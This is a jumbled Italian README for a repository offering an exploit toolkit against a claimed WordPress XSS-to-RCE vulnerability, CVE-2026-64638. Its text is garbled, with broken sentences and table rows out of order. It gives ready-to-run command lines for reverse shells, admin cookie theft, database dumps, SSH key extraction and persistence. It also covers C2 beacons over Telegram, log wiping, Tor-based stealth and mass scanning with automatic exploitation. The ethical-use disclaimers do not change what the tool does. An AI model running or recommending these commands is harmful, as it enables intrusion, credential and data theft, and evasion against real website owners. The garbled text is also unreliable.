
🛡️ CVE-2026-64638 - Suite di valutazione della sicurezza WordPress (CVSS 8.9) | Toolkit per penetration test WordPress 4.7.0-7.0.2. Include moduli di valutazione delle vulnerabilità e analisi avanzata. 🐍 Controllo sicuro ed exploit, 2 modalità. Toolkit avanzato Blue&Red Team 2026-64638, solo uso autorizzato. Rimanete legali <3zd

⚠️ SOLO USO ETICO – TEST DI SICUREZZA AUTORIZZATI
Questo repository fornisce strumenti esclusivamente per professionisti della sicurezza autorizzati, blue team e penetration tester.
L'accesso non autorizzato a sistemi informatici è illegale ai sensi del CFAA (USA), Computer Misuse Act (Regno Unito), TCK 243/244 (Turchia) e leggi simili in tutto il mondo.
CVE‑2026‑64638 è una vulnerabilità critica di XSS riflesso pre-autenticazione nelle versioni core di WordPress dalla 4.7.0 alla 7.0.2 che consente a un attaccante di escalare un attacco XSS a esecuzione remota di codice (RCE) completa tramite la funzionalità Application Password.
strip_tags() e wp_kses_post() di WordPress analizzano i tag HTML in modo diverso, consentendo a input dannosi di superare la sanificazione.wp-login.php). In caso di login fallito, il payload viene riflesso ed eseguito nel browser della vittima.| Strumento | Scopo | Utente previsto |
|---|---|---|
exploit.py | Toolkit di sfruttamento completo con reverse shell, persistenza, C2, escalation dei privilegi, analisi forense della memoria, dump del database, estrazione di chiavi SSH e scansione di massa. |
git clone https://github.com/tc4dy/CVE-2026-64638-PoC-Exploit
cd CVE-2026-64638-PoC-Exploit
pip install -r requirements.txt
requests
urllib3
#ops
pymysql
mysql-connector-python
PySocks
requests[socks]
exploit.pysafecheck.py| Endpoint | Scopo |
|---|---|
/wp-login.php | Pagina di login – punto di iniezione XSS |
/wp-admin/authorize-application.php |
Questo software è fornito esclusivamente a scopo educativo e per test di sicurezza autorizzati.
| Red team / penetration tester autorizzati |
safecheck.py | Verificatore non intrusivo di vulnerabilità che rileva la riflessione XSS e valuta il livello di sicurezza senza eseguire alcun payload dannoso. Genera report dettagliati. | Blue team / auditor di sicurezza |
| Funzionalità | exploit.py | safecheck.py |
|---|
| Rilevamento vulnerabilità | ✅ | ✅ |
| Rilevamento versione WordPress | ✅ | ✅ |
| Rilevamento riflessione XSS | ✅ | ✅ |
| Cattura Application Password | ✅ | ❌ |
| Caricamento plugin (RCE) | ✅ | ❌ |
| Reverse shell | ✅ | ❌ |
| Beacon C2 (HTTP/DNS/Telegram) | ✅ | ❌ |
| Escalation dei privilegi | ✅ | ❌ |
| Analisi forense della memoria | ✅ | ❌ |
| Dump del database | ✅ | ❌ |
| Estrazione chiavi SSH | ✅ | ❌ |
| Metodi di persistenza | ✅ | ❌ |
| Audit delle intestazioni di sicurezza | ❌ | ✅ |
| Verifica esposizione file di configurazione | ❌ | ✅ |
| Verifica elenco directory | ❌ | ✅ |
| Verifica esposizione phpinfo | ❌ | ✅ |
| Scansione di massa | ✅ | ✅ |
| Supporto proxy | ✅ | ✅ |
| Supporto Tor | ✅ | ✅ |
| Tunneling Ngrok | ✅ | ❌ |
| Shell interattiva | ✅ | ❌ |
| Modalità non intrusiva (sicura) | ❌ | ✅ |
| Output JSON / report | ✅ | ✅ |
| Scenario | Strumento consigliato |
|---|
| Blue Team – verifica se l'installazione WordPress è vulnerabile | safecheck.py |
| Security Audit – valutazione non intrusiva delle vulnerabilità | safecheck.py |
| Red Team – test di penetrazione autorizzati con sfruttamento completo | exploit.py |
| Bug Bounty – test di divulgazione responsabile | safecheck.py |
| Mass Scanning – verifica di più target per la vulnerabilità | exploit.py o safecheck.py |
| Incident Response – verifica se i sistemi sono compromessi | safecheck.py |
| Advanced Post‑Exploitation – persistenza, C2, analisi forense | exploit.py |
| Parametro | Descrizione |
|---|
-t, --target | URL del WordPress target (es. https://wordpress-site.com) |
-l, --list | File contenente l'elenco dei target (uno per riga) per la scansione di massa |
--lhost | Indirizzo IP locale per i callback della reverse shell |
--lport | Porta locale per la reverse shell (default: 4444) |
--proxy | Proxy HTTP/HTTPS (es. http://127.0.0.1:8080) |
--timeout | Timeout delle richieste in secondi (default: 10) |
--retry | Numero di tentativi (default: 3) |
--threads | Numero di thread per la scansione di massa (default: 5) |
--exploit | Sfrutta automaticamente i target vulnerabili durante la scansione di massa |
--ngrok-token | Authtoken Ngrok per tunneling esterno |
--payload-type | Tipo di payload XSS: reflected, dom_based, waf_bypass, case_manipulation, double_encoded |
--session-hijack | Abilita il dirottamento della sessione (ruba i cookie admin) |
--dump-db | Esegue il dump del database WordPress (richiede pymysql) |
--extract-ssh | Estrae le chiavi SSH dal sistema target |
--tor | Instrada il traffico attraverso Tor (socks5h://127.0.0.1:9050) |
--stealth | Abilita la modalità stealth (header contraffatti, richieste ritardate) |
--no-cleanup | Salta la pulizia dei log dopo lo sfruttamento |
--ssl-verify | Verifica i certificati SSL |
--c2-type | Tipo di C2: http, dns, telegram |
--c2-server | URL del server C2 o token del bot Telegram |
--auto-priv-esc | Escalation automatica dei privilegi dopo la shell |
--memory-forensics | Abilita il modulo di analisi forense della memoria |
-v, --verbose | Output verboso |
-q, --quiet | Modalità silenziosa (output minimo) |
| Parametro | Descrizione |
|---|
-t, --target | URL del WordPress target (es. https://wordpress-site.com) |
-l, --list | File contenente l'elenco dei target (uno per riga) per la scansione di massa |
--timeout | Timeout delle richieste in secondi (default: 10) |
--retry | Numero di tentativi (default: 3) |
--threads | Numero di thread per la scansione di massa (default: 5) |
--proxy | Proxy HTTP/HTTPS (es. http://127.0.0.1:8080) |
--tor | Instrada il traffico attraverso Tor (socks5h://127.0.0.1:9050) |
--ssl-verify | Verifica i certificati SSL |
--output | File di report JSON in output |
-v, --verbose | Output verboso |
-q, --quiet | Modalità silenziosa (output minimo) |
| # | Scenario | Comando |
|---|
| 1 | Controllo rapido della vulnerabilità | python safecheck.py -t https://wordpress-site.com |
| 2 | Scansione dettagliata con report | python safecheck.py -t https://wordpress-site.com --output report.json -v |
| 3 | Sfruttamento completo con reverse shell | python exploit.py -t https://wordpress-site.com --lhost 192.168.1.100 --exploit |
| 4 | Usa payload XSS personalizzato | python exploit.py -t https://wordpress-site.com --payload-type waf_bypass |
| 5 | Dirottamento della sessione (ruba cookie admin) | python exploit.py -t https://wordpress-site.com --session-hijack |
| 6 | Dump del database WordPress | python exploit.py -t https://wordpress-site.com --dump-db |
| 7 | Estrazione delle chiavi SSH | python exploit.py -t https://wordpress-site.com --extract-ssh |
| 8 | Usa Tor per l'anonimato | python exploit.py -t https://wordpress-site.com --tor --stealth |
| 9 | Beacon C2 con Telegram | python exploit.py -t https://wordpress-site.com --c2-type telegram --c2-server "https://api.telegram.org/botTOKEN/chat_id" |
| 10 | Scansione di massa da file | python exploit.py -l targets.txt --threads 10 --exploit |
| 11 | Analisi forense della memoria dopo la shell | python exploit.py -t https://wordpress-site.com --memory-forensics |
| 12 | Escalation automatica dei privilegi | python exploit.py -t https://wordpress-site.com --auto-priv-esc |
| 13 | Shell interattiva | python exploit.py -t https://wordpress-site.com -i |
| 14 | Tunneling Ngrok | python exploit.py -t https://wordpress-site.com --ngrok-token YOUR_TOKEN |
| Comando | Descrizione |
|---|
reverse | Avvia il listener della reverse shell |
persist | Applica metodi di persistenza (cron, systemd, rc.local, SSH, WP) |
clean | Pulisce i log di sistema e la cronologia |
dumpdb | Dump del database WordPress |
ssh | Estrae le chiavi SSH |
priv | Escalation automatica dei privilegi |
mem | Esegue analisi forense della memoria |
c2 | Mostra lo stato del C2 |
c2task | Controlla la presenza di attività C2 |
exit | Esci dalla shell interattiva |
| Generazione Application Password |
/wp-admin/update.php?action=upload-plugin | Caricamento plugin (RCE) |
/wp-content/plugins/{slug}/{slug}.php | Esecuzione webshell |
| Paese | Legge pertinente |
|---|
| Stati Uniti | Computer Fraud and Abuse Act (CFAA) – 18 U.S.C. § 1030 |
| Regno Unito | Computer Misuse Act 1990 |
| Turchia | TCK 243 (Accesso non autorizzato), TCK 244 (Interferenza con il sistema) |
| Germania | StGB § 202a (Spionaggio informatico), § 202b (Intercettazione dati) |
| Francia | Loi Godfrain – Article 323-1 |
| Australia | Cybercrime Act 2001 |
| Canada | Criminal Code – Section 342.1 |
| India | Information Technology Act 2000 – Sezione 43, 66 |
| Giappone | Legge sul divieto di accesso non autorizzato ai computer |